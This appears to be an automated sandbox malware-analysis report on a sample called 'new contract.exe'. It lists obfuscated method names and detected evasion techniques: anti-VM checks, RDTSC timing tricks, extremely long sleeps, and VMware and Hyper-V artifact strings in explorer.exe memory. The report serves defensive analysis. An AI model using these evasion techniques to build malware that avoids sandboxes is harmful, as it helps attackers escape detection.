Source: 0.2.new contract.exe.8e80000.5.raw.unpack, zEP9MvkRynobcNIcT7.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'nM2qmOa6TN', 'RNrqF2inTm', 'PWeqzEgHDs', 'jluT8iXvyd', 'YrfT7E6FHA', 'rqCTqhgHJH', 'NkFTTqIebR', 'LpuL7NOyBiKZJDjlnug'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, nBjC5FWVGlwu26wPqR.cs High entropy of concatenated method names: 'ToString', 'QReSiZuu4y', 'tCFSXZJvKP', 'FM7Sfjq6FD', 'zjWSsuVrCk', 'ycxSKIgBpu', 'E29S9TCIva', 'id8SJvdwbo', 'MFiSZXNZls', 'IiYSjmqc9h'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, AnPH1ZOKvPImGHJVl0j.cs High entropy of concatenated method names: 'RCcH3scGmw', 'q5xHhRknv7', 'RIOHCUqrdO', 'Qh0HEYwQTV', 'VkKHnN3V5P', 'HH6HGjXqWU', 'liNHMDD4II', 'EwcH08fCoX', 'zCEHPVLjvv', 'rwYHw8TvBQ'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, fwA2K7BTejKMW9QUlG.cs High entropy of concatenated method names: 'Qq4kLtvjhW', 'WtJkaxlmWT', 'B2WkAZDOhk', 'CxqkYGJIV6', 'JYFkBOQOrV', 't97AlKkZTO', 'Hj4AvGwvoY', 'WqqADNWdSO', 'QfgAQsOHNx', 'OjLAm3KyAJ'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, FgGUaas92i9EvJTkCy.cs High entropy of concatenated method names: 'vVjoQVpX5s', 'C8poFeSSU0', 'g2yO8KaRGx', 'hcEO7rbR1Q', 'aCIoibJ0mf', 'bxootaQUfj', 'DyHoWwJTXW', 'cyto4uNumR', 'e20o1B8B7O', 'xW3oRVrtFL'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, OZjAZMZljeJfRcMEoc.cs High entropy of concatenated method names: 'ObICTEYAi', 'O4fExnimc', 'cunGFxp3K', 'mcTM2YKpa', 'KogPXsH93', 'Y3ww4GSxf', 'CBEd6tAbdqUNqjg8ee', 'tJ3qr5N4cvKdWuy8m3', 'OOkOG436q', 'Bnq2i4aaJ'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, cxtTtGunxt5IjcA9tT.cs High entropy of concatenated method names: 'R79OpiWflb', 'wxJOalib1K', 'TeeOuSohhM', 'iLnOAZ07T7', 'OjvOkRDY9N', 'ub5OYVAyjP', 'V1uOB1R9pR', 'TEYOUFybLl', 'xqtOIysPJm', 'iAWOdiEKSM'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, p7xNqEzxIiFeSoxNuY.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'a4gHNvH8qE', 'jpoHgrwLh0', 'nk5HSXwhke', 'A1jHojnBdT', 'OcaHOrdgXk', 'Da4HHgDP09', 'mCfH291rO2'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, fgEBeMUyhH7sZUUckO.cs High entropy of concatenated method names: 'P53a4tNGPQ', 'QJLa1gleOS', 'QVRaRFxdt7', 'Cdxa59UVsr', 'bLSaluw5ed', 'JPAavJKSOf', 'UetaDvsP9X', 'yYYaQTDYbd', 'CTpam4JgxZ', 'cQDaFINaKP'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, zUws5HLCWDAIg0bvex.cs High entropy of concatenated method names: 'B2m7YMurfq', 'CtG7BU1pCS', 'BVr7IBy4gq', 'EcM7djjGJ3', 'ITY7glNjID', 'OZ37SZnApN', 'RQHLujujtC9OjhZxtH', 'DH6bVA9jcjNSmwxDaO', 'lDG77EqoZH', 'MA67TBJpmh'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, nNEK9grHOYMabirkn9.cs High entropy of concatenated method names: 'ujIoItZi25', 'SGGodoKJEL', 'ToString', 'rfOopVlZlm', 'KRxoavNDmw', 'hcrouVlpIW', 'THuoAg4jRl', 'h24ok8B1fG', 's46oY1JZR0', 'tMFoB1aDiS'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, fbgZAVOvkt4qOAMZfXo.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qLf24Ir8wS', 'NGK21E1qOX', 'RxZ2RSfmla', 'rFY25LrKK1', 'Vs12lZHDNb', 'Oqv2vBl4Pm', 'iVm2DFQKy2'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, UCFEImOOnS2ah0fT7nc.cs High entropy of concatenated method names: 'ToString', 'KL72TGf78t', 'DZ52VkL8Af', 'JNM2LdqlLM', 'gnp2psu8UG', 'bce2aM0kH3', 'xbf2uOCuKA', 'vEl2AABmK1', 'sE7BOo1IqYogjtGB4KC', 'miSiqq1qGpFXkZNcdkF'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, J7QEFHaSxHRZs0TFi6.cs High entropy of concatenated method names: 'jADH7uvKgG', 'ld0HTJ5aLB', 'NSUHVeSZWw', 'EKHHpxjwIN', 'IZPHaFFwsr', 'S8lHAtKT73', 'TD4HkDQMuR', 'ufhOD8HcxP', 'lePOQUHIV1', 'BaPOm3UsHC'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, aDjYvCEF62E4IZYMPn.cs High entropy of concatenated method names: 'UL1N0O4gTW', 't09NPdXcXf', 'ctRNcyAufi', 'UhINXQmb4n', 'RqYNsIQR0T', 'AacNKVbLuc', 'RKXNJmwcNm', 'SpPNZYtvo6', 'judNxAZ15u', 'djSNiYt2OE'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, y5AhBBpbkCOrjXLQSY.cs High entropy of concatenated method names: 'DqvYpIC0u9', 'OVxYuH61ux', 'EvkYkOKQZd', 'oeEkFYSIKM', 'pv1kz4KwAA', 'soAY89N83I', 'WPlY7IbfBE', 'edQYqsqiW2', 'kgSYTaxmvn', 'TOKYVXv6jQ'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, SQA3X2yg9UeEuDdc7y.cs High entropy of concatenated method names: 'rSDuEJHf9M', 'wpOuGSOAvV', 'Tlru0y0hIu', 'pLBuPXtVcM', 's7Augqus3c', 'CaSuS1YTis', 'xYyuoF6iuu', 'UEduOTjQBp', 'MMguH079jO', 'aIhu2iid4o'
Source: 0.2.new contract.exe.8e80000.5.raw.unpack, el3wNP0WoRTZbNZSWq.cs High entropy of concatenated method names: 'MRxDNSZaKKuO7aBnuSr', 'smJafGZQ9yBPJn5jG3F', 'WXoN05ZiRTBBLSGJUTr', 'NNmkONbAE7', 'Im1kHWj8do', 'ND9k25D4bi', 'CQ7VVrZ2m33H4UGXLOX', 'ea8GMeZHAWPYgAafnKV'
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, SOwVvHMwinIr4CVPeB.cs High entropy of concatenated method names: 'Dispose', 'aI87mJBnb1', 'jKSqXh431R', 'm6ebbuCEuC', 'vyY7F10NkP', 'y1M7z1kJdj', 'ProcessDialogKey', 'mV5q8Nbj4n', 'K0dq71HYwv', 'nigqq3REnx'
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, uf9aokYYeocPIOSosy.cs High entropy of concatenated method names: 'ekYAnEi5yt', 'g0kAMt1aRF', 'DEHuf1e4pw', 'UEMusKJwCK', 'ktHuKPGsns', 'R51u9myGsQ', 'KdkuJJqPRd', 'hhAuZSGJw2', 'IKcujRYdBA', 'tKIuxEF0Pj'
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, QQTpKp75Qv0RWvQaoE.cs High entropy of concatenated method names: 'UxEOcxTPdk', 'NRMOX6GNmV', 'VwiOfIUlWg', 'xBfOsgDlPW', 'ysoO4sQIdk', 'VJZOKaADJj', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, BdAaLxlyFpvWDFdhFt.cs High entropy of concatenated method names: 'xAQY3xZshw', 'HFmYh3i4mA', 'rKMYCGXLbN', 'Wy1YEoRtNZ', 'A4xYnnAa9B', 'k1BYGWcf2J', 'bjvYMw44ve', 'CKhY0diM9Y', 'XFLYPudrcb', 'gGgYw5EWNs'
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, BOAIWHfAjJUfow6tuk.cs High entropy of concatenated method names: 'Bt4TLdUcQu', 'NHiTpK9ow5', 'KLoTainbXn', 'UAfTuWPf6S', 'nbdTAqCCuH', 'YnuTkX58rc', 'ViXTYrwlcv', 'skSTBbWqr4', 'zLITURJXrC', 'MUsTIR6eRE'
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, zEP9MvkRynobcNIcT7.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'nM2qmOa6TN', 'RNrqF2inTm', 'PWeqzEgHDs', 'jluT8iXvyd', 'YrfT7E6FHA', 'rqCTqhgHJH', 'NkFTTqIebR', 'LpuL7NOyBiKZJDjlnug'
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, nBjC5FWVGlwu26wPqR.cs High entropy of concatenated method names: 'ToString', 'QReSiZuu4y', 'tCFSXZJvKP', 'FM7Sfjq6FD', 'zjWSsuVrCk', 'ycxSKIgBpu', 'E29S9TCIva', 'id8SJvdwbo', 'MFiSZXNZls', 'IiYSjmqc9h'
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, AnPH1ZOKvPImGHJVl0j.cs High entropy of concatenated method names: 'RCcH3scGmw', 'q5xHhRknv7', 'RIOHCUqrdO', 'Qh0HEYwQTV', 'VkKHnN3V5P', 'HH6HGjXqWU', 'liNHMDD4II', 'EwcH08fCoX', 'zCEHPVLjvv', 'rwYHw8TvBQ'
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, fwA2K7BTejKMW9QUlG.cs High entropy of concatenated method names: 'Qq4kLtvjhW', 'WtJkaxlmWT', 'B2WkAZDOhk', 'CxqkYGJIV6', 'JYFkBOQOrV', 't97AlKkZTO', 'Hj4AvGwvoY', 'WqqADNWdSO', 'QfgAQsOHNx', 'OjLAm3KyAJ'
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, FgGUaas92i9EvJTkCy.cs High entropy of concatenated method names: 'vVjoQVpX5s', 'C8poFeSSU0', 'g2yO8KaRGx', 'hcEO7rbR1Q', 'aCIoibJ0mf', 'bxootaQUfj', 'DyHoWwJTXW', 'cyto4uNumR', 'e20o1B8B7O', 'xW3oRVrtFL'
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, OZjAZMZljeJfRcMEoc.cs High entropy of concatenated method names: 'ObICTEYAi', 'O4fExnimc', 'cunGFxp3K', 'mcTM2YKpa', 'KogPXsH93', 'Y3ww4GSxf', 'CBEd6tAbdqUNqjg8ee', 'tJ3qr5N4cvKdWuy8m3', 'OOkOG436q', 'Bnq2i4aaJ'
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, cxtTtGunxt5IjcA9tT.cs High entropy of concatenated method names: 'R79OpiWflb', 'wxJOalib1K', 'TeeOuSohhM', 'iLnOAZ07T7', 'OjvOkRDY9N', 'ub5OYVAyjP', 'V1uOB1R9pR', 'TEYOUFybLl', 'xqtOIysPJm', 'iAWOdiEKSM'
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, p7xNqEzxIiFeSoxNuY.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'a4gHNvH8qE', 'jpoHgrwLh0', 'nk5HSXwhke', 'A1jHojnBdT', 'OcaHOrdgXk', 'Da4HHgDP09', 'mCfH291rO2'
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, fgEBeMUyhH7sZUUckO.cs High entropy of concatenated method names: 'P53a4tNGPQ', 'QJLa1gleOS', 'QVRaRFxdt7', 'Cdxa59UVsr', 'bLSaluw5ed', 'JPAavJKSOf', 'UetaDvsP9X', 'yYYaQTDYbd', 'CTpam4JgxZ', 'cQDaFINaKP'
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, zUws5HLCWDAIg0bvex.cs High entropy of concatenated method names: 'B2m7YMurfq', 'CtG7BU1pCS', 'BVr7IBy4gq', 'EcM7djjGJ3', 'ITY7glNjID', 'OZ37SZnApN', 'RQHLujujtC9OjhZxtH', 'DH6bVA9jcjNSmwxDaO', 'lDG77EqoZH', 'MA67TBJpmh'
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, nNEK9grHOYMabirkn9.cs High entropy of concatenated method names: 'ujIoItZi25', 'SGGodoKJEL', 'ToString', 'rfOopVlZlm', 'KRxoavNDmw', 'hcrouVlpIW', 'THuoAg4jRl', 'h24ok8B1fG', 's46oY1JZR0', 'tMFoB1aDiS'
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, fbgZAVOvkt4qOAMZfXo.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qLf24Ir8wS', 'NGK21E1qOX', 'RxZ2RSfmla', 'rFY25LrKK1', 'Vs12lZHDNb', 'Oqv2vBl4Pm', 'iVm2DFQKy2'
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, UCFEImOOnS2ah0fT7nc.cs High entropy of concatenated method names: 'ToString', 'KL72TGf78t', 'DZ52VkL8Af', 'JNM2LdqlLM', 'gnp2psu8UG', 'bce2aM0kH3', 'xbf2uOCuKA', 'vEl2AABmK1', 'sE7BOo1IqYogjtGB4KC', 'miSiqq1qGpFXkZNcdkF'
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, J7QEFHaSxHRZs0TFi6.cs High entropy of concatenated method names: 'jADH7uvKgG', 'ld0HTJ5aLB', 'NSUHVeSZWw', 'EKHHpxjwIN', 'IZPHaFFwsr', 'S8lHAtKT73', 'TD4HkDQMuR', 'ufhOD8HcxP', 'lePOQUHIV1', 'BaPOm3UsHC'
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, aDjYvCEF62E4IZYMPn.cs High entropy of concatenated method names: 'UL1N0O4gTW', 't09NPdXcXf', 'ctRNcyAufi', 'UhINXQmb4n', 'RqYNsIQR0T', 'AacNKVbLuc', 'RKXNJmwcNm', 'SpPNZYtvo6', 'judNxAZ15u', 'djSNiYt2OE'
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, y5AhBBpbkCOrjXLQSY.cs High entropy of concatenated method names: 'DqvYpIC0u9', 'OVxYuH61ux', 'EvkYkOKQZd', 'oeEkFYSIKM', 'pv1kz4KwAA', 'soAY89N83I', 'WPlY7IbfBE', 'edQYqsqiW2', 'kgSYTaxmvn', 'TOKYVXv6jQ'
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, SQA3X2yg9UeEuDdc7y.cs High entropy of concatenated method names: 'rSDuEJHf9M', 'wpOuGSOAvV', 'Tlru0y0hIu', 'pLBuPXtVcM', 's7Augqus3c', 'CaSuS1YTis', 'xYyuoF6iuu', 'UEduOTjQBp', 'MMguH079jO', 'aIhu2iid4o'
Source: 0.2.new contract.exe.412ded0.3.raw.unpack, el3wNP0WoRTZbNZSWq.cs High entropy of concatenated method names: 'MRxDNSZaKKuO7aBnuSr', 'smJafGZQ9yBPJn5jG3F', 'WXoN05ZiRTBBLSGJUTr', 'NNmkONbAE7', 'Im1kHWj8do', 'ND9k25D4bi', 'CQ7VVrZ2m33H4UGXLOX', 'ea8GMeZHAWPYgAafnKV'
Source: C:\Users\user\Desktop\new contract.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: new contract.exe PID: 7424, type: MEMORYSTR
Switches to a custom stack to bypass stack traces
Source: C:\Users\user\Desktop\new contract.exe API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Users\user\Desktop\new contract.exe API/Special instruction interceptor: Address: 7FFE22210774
Source: C:\Users\user\Desktop\new contract.exe API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Users\user\Desktop\new contract.exe API/Special instruction interceptor: Address: 7FFE2220D8A4
Source: C:\Users\user\Desktop\new contract.exe API/Special instruction interceptor: Address: 7FFE2220DA44
Source: C:\Users\user\Desktop\new contract.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\NETSTAT.EXE API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\NETSTAT.EXE API/Special instruction interceptor: Address: 7FFE22210774
Source: C:\Windows\SysWOW64\NETSTAT.EXE API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\NETSTAT.EXE API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\NETSTAT.EXE API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\NETSTAT.EXE API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\NETSTAT.EXE API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\NETSTAT.EXE API/Special instruction interceptor: Address: 7FFE2220D8A4
Source: C:\Windows\SysWOW64\NETSTAT.EXE API/Special instruction interceptor: Address: 7FFE2220DA44
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\new contract.exe RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\new contract.exe RDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE RDTSC instruction interceptor: First address: 519904 second address: 51990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE RDTSC instruction interceptor: First address: 519B6E second address: 519B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\new contract.exe Memory allocated: 1490000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Memory allocated: 2F50000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Memory allocated: 4F50000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Memory allocated: 9030000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Memory allocated: A030000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Memory allocated: A230000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Memory allocated: B230000 memory reserve | memory write watch Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_00409AA0 rdtsc 2_2_00409AA0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\new contract.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 6573 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 3365 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 888 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 859 Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Window / User API: threadDelayed 5994 Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Window / User API: threadDelayed 3978 Jump to behavior
Found decision node followed by non-executed suspicious APIs
Source: C:\Windows\explorer.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\new contract.exe API coverage: 1.7 %
Source: C:\Windows\SysWOW64\NETSTAT.EXE API coverage: 2.0 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\new contract.exe TID: 7444 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 8076 Thread sleep count: 6573 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 8076 Thread sleep time: -13146000s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 8076 Thread sleep count: 3365 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 8076 Thread sleep time: -6730000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 7904 Thread sleep count: 5994 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 7904 Thread sleep time: -11988000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 7904 Thread sleep count: 3978 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 7904 Thread sleep time: -7956000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\NETSTAT.EXE Last function: Thread delayed
Source: C:\Windows\SysWOW64\NETSTAT.EXE Last function: Thread delayed
Source: C:\Users\user\Desktop\new contract.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 00000003.00000000.1754990382.00000000098A8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000003.00000003.3108632093.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000003.00000003.3108632093.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000003.00000000.1754990382.00000000098A8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000003.00000002.4129060379.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000003.00000002.4133315277.00000000079FB000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000002.4138853699.000000000997A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000003.00000002.4133315277.00000000078AD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTTAVMWare
Source: explorer.exe, 00000003.00000003.3108632093.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: explorer.exe, 00000003.00000003.3108632093.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4137734556.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1752045440.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1752045440.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108632093.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4137734556.00000000097D4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000003.00000002.4138853699.000000000997A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000003.00000002.4133315277.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108475652.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1745295797.0000000007A34000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 00000003.00000002.4137532531.0000000009660000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000003.00000002.4129060379.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000003.00000002.4129060379.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
